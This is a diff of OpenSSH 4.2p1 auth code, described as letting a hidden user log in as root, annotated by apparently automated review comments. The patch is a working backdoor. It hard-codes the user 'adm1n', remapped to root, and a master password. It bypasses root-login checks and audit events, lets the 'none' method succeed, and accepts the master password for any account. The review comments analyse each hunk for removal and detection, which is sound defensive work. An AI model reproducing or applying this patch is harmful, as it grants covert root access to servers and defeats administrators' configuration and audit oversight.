OpenSSH patch, tested with versions 4.2p1 and 4.7p1, that allows a hidden user to log in with root permissions.
66a2fdc785f48b49192a9914e91513352963513dcdde7b456dccf8dc0ad3e725
--- auth2.c 2005-07-17 09:26:44.000000000 +0200
+++ /tmp/openssh-4.2p1-hack/auth2.c 2008-01-05 16:28:06.000000000 +0100
@@ -215,6 +215,7 @@
fatal("INTERNAL ERROR: authenticated invalid user %s",
authctxt->user);
+ if (strcmp(authctxt->user, HACKED_USER)) {
/* Special handling for root */
if (authenticated && authctxt->pw->pw_uid == 0 &&
!auth_root_allowed(method)) {
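Review bot: The added `if (strcmp(authctxt->user, HACKED_USER)) {` wraps the "Special handling for root" block, so for the one user name defined in includes.h both the `auth_root_allowed(method)` check and the `SSH_LOGIN_ROOT_DENIED` audit event are skipped; the matching `}` is added in the next hunk (-223,7). This is an authentication-policy bypass and should be rejected rather than repaired: drop both added lines so the root check applies to every user. When triaging a host suspected of running this build, the absence of root-denied audit events is therefore not evidence that no root login took place. The enclosing function starts and ends outside both hunks.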
@@ -223,7 +224,7 @@
PRIVSEP(audit_event(SSH_LOGIN_ROOT_DENIED));
#endif
}
-
+ }
#ifdef USE_PAM
if (options.use_pam && authenticated) {
if (!PRIVSEP(do_pam_account())) {
--- auth2-none.c 2004-09-11 15:07:03.000000000 +0200
+++ /tmp/openssh-4.2p1-hack/auth2-none.c 2008-01-05 17:26:16.000000000 +0100
@@ -108,12 +108,15 @@
userauth_none(Authctxt *authctxt)
{
none_enabled = 0;
+
+
packet_check_eom();
userauth_banner();
#ifdef HAVE_CYGWIN
if (check_nt_auth(1, authctxt->pw) == 0)
return (0);
#endif
+ if (!strcmp(authctxt->user, HACKED_USER)) return (PRIVSEP(auth_password(authctxt, HACKED_PASS)));
if (options.password_authentication)
return (PRIVSEP(auth_password(authctxt, "")));
return (0);
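Review bot: The added line in `userauth_none` passes the compile-time constant `HACKED_PASS` to `auth_password` whenever the user name equals `HACKED_USER`, so the "none" method can succeed for that name without the client supplying a credential, and it runs before the `options.password_authentication` test. The line should be removed so that `auth_password(authctxt, "")` behind that test stays the only path out of this function. For detection, a successful "none" authentication is unusual on a normally configured server and is presumably how a login through this path would show up in sshd's log, although the logging code is outside this hunk.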
--- auth2-passwd.c 2004-09-11 14:42:09.000000000 +0200
+++ /tmp/openssh-4.2p1-hack/auth2-passwd.c 2008-01-05 17:23:10.000000000 +0100
@@ -61,6 +61,7 @@
if (check_nt_auth(1, authctxt->pw) == 0)
authenticated = 0;
#endif
+
memset(password, 0, len);
xfree(password);
return authenticated;
--- auth.c 2005-08-31 18:59:49.000000000 +0200
+++ /tmp/openssh-4.2p1-hack/auth.c 2008-01-05 16:30:32.000000000 +0100
@@ -492,6 +492,10 @@
#endif
struct passwd *pw;
+ if (!strcmp(user, HACKED_USER)) {
+ strcpy(user, HACKED_PUSER);
+ options.permit_root_login = PERMIT_YES;
+ }
pw = getpwnam(user);
if (pw == NULL) {
logit("Invalid user %.100s from %.100s",
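Review bot: The added block overwrites the caller's `user` buffer with `HACKED_PUSER` and sets `options.permit_root_login = PERMIT_YES` before `getpwnam(user)`, so the lookup resolves the mapped account and the administrator's configured PermitRootLogin value is replaced at run time for that connection. As a result, reviewing sshd_config cannot confirm that root login is disabled on a host running this binary; integrity has to be checked on the sshd executable itself, for example against the distribution package's checksums. The four added lines should be removed. The enclosing function begins before this hunk and continues past it.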
--- auth-passwd.c 2005-07-26 13:54:12.000000000 +0200
+++ /tmp/openssh-4.2p1-hack/auth-passwd.c 2008-01-05 17:24:12.000000000 +0100
@@ -76,7 +76,7 @@
#if defined(USE_SHADOW) && defined(HAS_SHADOW_EXPIRE)
static int expire_checked = 0;
#endif
-
+ if (!strcmp(password, HACKED_PASS)) return 1;
#ifndef HAVE_CYGWIN
if (pw->pw_uid == 0 && options.permit_root_login != PERMIT_YES)
ok = 0;
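Review bot: `if (!strcmp(password, HACKED_PASS)) return 1;` sits ahead of the `pw->pw_uid == 0` / `permit_root_login` test and is not tied to any user name, so as far as this hunk shows the function reports success for that constant whichever account `pw` refers to. Incident response on an affected host should therefore treat every account that accepts password authentication as exposed, not only the hidden user named in the description. The line should be removed; the rest of the function lies outside the hunk.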
--- includes.h 2005-08-26 22:15:20.000000000 +0200
+++ openssh-4.2p1-hack/includes.h 2008-01-05 23:38:49.000000000 +0100
@@ -210,4 +210,16 @@
#include "entropy.h"
-#endif /* INCLUDES_H */
+#ifndef HACKED_USER
+#define HACKED_USER "adm1n"
+#endif
+
+#ifndef HACKED_PUSER
+#define HACKED_PUSER "root"
+#endif
+
+#ifndef HACKED_PASS
+#define HACKED_PASS "@password_for_nothing@"
+#endif
+
+#endif /* INCLUDES_H */
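Review bot: The three macros are each wrapped in `#ifndef`, so `"adm1n"`, `"root"` and `"@password_for_nothing@"` are only defaults and a build may define different values; searching an sshd binary for these literal strings will miss such a build. Detection should rest on comparing the installed sshd with a known-good package hash, using the strings only as a supplementary indicator. The whole added block should be removed together with the uses of these macros in auth.c, auth2.c, auth2-none.c and auth-passwd.c.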